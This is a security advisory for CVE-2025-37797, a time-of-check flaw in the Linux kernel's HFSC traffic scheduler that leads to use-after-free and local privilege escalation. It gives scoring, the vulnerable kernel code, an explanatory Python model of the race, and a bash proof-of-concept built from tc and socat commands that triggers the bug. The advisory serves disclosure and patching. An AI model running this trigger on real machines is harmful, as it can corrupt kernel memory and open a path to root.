(CVE-2025-37797) Linux Kernel hfsc_change_class TOCTOU Leading to Use-After-Free and Local Privilege Escalation

Advisory, May 2, 2025, by Gerrard Tai

CVE: CVE-2025-37797

Affected Versions: Linux kernel (multiple stable branches through 6.15-rc)

CVSS3.1: 7.8 (High) — CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

Product: Linux Kernel (net_sched)
Vendor: Linux Kernel
Severity: High — a local unprivileged attacker may exploit this to achieve local privilege escalation
Affected Versions: Linux kernel (multiple stable branches through 6.15-rc)
CVE Identifier: CVE-2025-37797
CVE Description: A TOCTOU flaw in the Linux kernel HFSC qdisc’s hfsc_change_class allows an empty class to be inserted into the vttree, leading to a use-after-free and local privilege escalation.
CWE Classification(s): CWE-416: Use After Free

CVSS4.0 Scoring System

Base Score: 8.5 Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Metric Value
Attack Vector (AV) Local
Attack Complexity (AC) Low
Attack Requirements (AT) None
Privileges Required (PR) Low
User Interaction (UI) None
Vulnerable System Confidentiality (VC) High
Vulnerable System Integrity (VI) High
Vulnerable System Availability (VA) High
Subsequent System Confidentiality (SC) None
Subsequent System Integrity (SI) None
Subsequent System Availability (SA) None

Technical Details

A use-after-free vulnerability in the Linux Kernel net scheduler subsystem can be exploited to achieve local privilege escalation. In the hfsc_change_class routine, peeking a child qdisc can empty it, and there is no subsequent check that the child qdisc is still non-empty before the class is added to the hfsc qdisc’s internal trees. This causes a use-after-free vulnerability. We recommend upgrading past commit 3df275ef0a6ae181e8428a6589ef5d5231e58b5c.

The vulnerability lies in the hfsc_change_class() function.

	if (cl->qdisc->q.qlen != 0) {                      // [1]
		int len = qdisc_peek_len(cl->qdisc);           // [2]

		if (cl->cl_flags & HFSC_RSC) {
			if (old_flags & HFSC_RSC)
				update_ed(cl, len);
			else
				init_ed(cl, len);
		}

		if (cl->cl_flags & HFSC_FSC) {
			if (old_flags & HFSC_FSC)
				update_vf(cl, 0, cur_time);
			else
				init_vf(cl, len);                      // [3]
		}
	}

The logic of [1] and [3] is to add non-empty classes to the hfsc’s vttree. However, it is possible for a qdisc to be non-empty at [1], but the call to qdisc_peek_len ([2]) empties it. This is not checked for, leading to the activation of an empty class. This breaks the logic of hfsc, which relies on update_vf() to be called whenever the child qdisc is emptied (e.g. from hfsc_dequeue() or hfsc_qlen_notify()). Since the class is already empty, there will be no subsequent calls to update_vf(), allowing the class to be deleted without first removing it from vttree. This leads to UAF, which can be escalated to LPE as demonstrated in https://github.com/google/security-research/blob/a42a2e8be65216409760099dd464f9e0e70b08e3/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md
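To make the sequence above concrete, here is an added Python model of the TOCTOU (educational code written for this page, not kernel code and not part of the advisory): a child qdisc whose peek drains it, the [1]–[3] block, and the class deletion path that only detaches a class from vttree when the child still holds packets. The `recheck_after_peek` flag is an assumed illustrative hardening (re-validate qlen after the peek), not a transcription of the upstream fix; all class and function names are assumptions.

```python
# Added educational model of the CVE-2025-37797 TOCTOU (not kernel code).
# Assumed names: ChildQdisc, HfscClass, change_class, delete_class, run_scenario.

class ChildQdisc:
    """Child qdisc; peek_drains=True models netem over blackhole, where
    qdisc_peek_len() drops the peeked packet and empties the queue."""
    def __init__(self, packets, peek_drains):
        self.q, self.peek_drains = list(packets), peek_drains

    def qlen(self):
        return len(self.q)

    def peek_len(self):  # [2]: head packet length; may empty the child
        return self.q.pop(0) if self.peek_drains else self.q[0]

class HfscClass:
    def __init__(self, classid, qdisc):
        self.classid, self.qdisc, self.freed = classid, qdisc, False

def update_vf(cl, vttree):
    # hfsc calls this when the child empties; it detaches cl from vttree.
    if cl in vttree:
        vttree.remove(cl)

def change_class(cl, vttree, recheck_after_peek):
    """Models the [1]-[3] block of hfsc_change_class(); vttree is a list."""
    if cl.qdisc.qlen() != 0:                 # [1] time of check
        cl.vt = cl.qdisc.peek_len()          # [2] may drain the child
        if recheck_after_peek and cl.qdisc.qlen() == 0:
            return  # assumed hardening: do not activate a now-empty class
        vttree.append(cl)                    # [3] init_vf(): time of use

def delete_class(cl, vttree):
    # Purging a non-empty child notifies hfsc (update_vf), which detaches the
    # class; an already-empty child produces no notification at all.
    if cl.qdisc.qlen() != 0:
        cl.qdisc.q.clear()
        update_vf(cl, vttree)
    cl.freed = True                          # class memory is released

def run_scenario(peek_drains, recheck_after_peek):
    """Return class ids still referenced from vttree after being freed."""
    vttree = []
    cl = HfscClass("3:1", ChildQdisc([64], peek_drains))  # constructed input
    change_class(cl, vttree, recheck_after_peek)
    delete_class(cl, vttree)
    return [c.classid for c in vttree if c.freed]
```

`run_scenario(True, False)` returns `['3:1']`, a freed class still linked from vttree (the dangling reference), while `run_scenario(True, True)` and a non-draining child both return `[]`.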

Proof of Concept

#!/bin/bash

IP=/mnt/iproute2-next/ip/ip
TC=/mnt/iproute2-next/tc/tc
SOCAT=socat

$IP link set dev lo up
$TC qdisc add dev lo handle 1:0 root drr
$TC class add dev lo parent 1:0 classid 1:1 drr
$TC class add dev lo parent 1:0 classid 1:2 drr

$TC qdisc add dev lo handle 2:0 parent 1:1 plug limit 1024
echo "" | $SOCAT -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))

$TC qdisc add dev lo parent 1:2 handle 3:0 hfsc default 1
$TC class add dev lo parent 3:0 classid 3:1 hfsc \
    rt m1 5Mbit d 10ms m2 10Mbit
$TC qdisc add dev lo parent 3:1 handle 4:0 netem delay 1ms
$TC qdisc add dev lo parent 4:1 handle 5:0 blackhole
echo "" | $SOCAT -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))

$TC class change dev lo parent 3:0 classid 3:1 hfsc \
    sc m1 5Mbit d 10ms m2 10Mbit

$TC class del dev lo parent 3:0 classid 3:1

$TC class add dev lo parent 3:0 classid 3:1 hfsc \
    rt m1 5Mbit d 10ms m2 10Mbit

echo "" | $SOCAT -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))

Fix

Upgrade past commit 3df275ef.

References

Credit

Gerrard Tai of STAR Labs SG Pte. Ltd.

Timeline

  • 2025-04-10 — Reported to Linux Kernel Security Team
  • 2025-05-02 — CVE-2025-37797 published

Source: https://starlabs.sg/advisories/25/25-37797/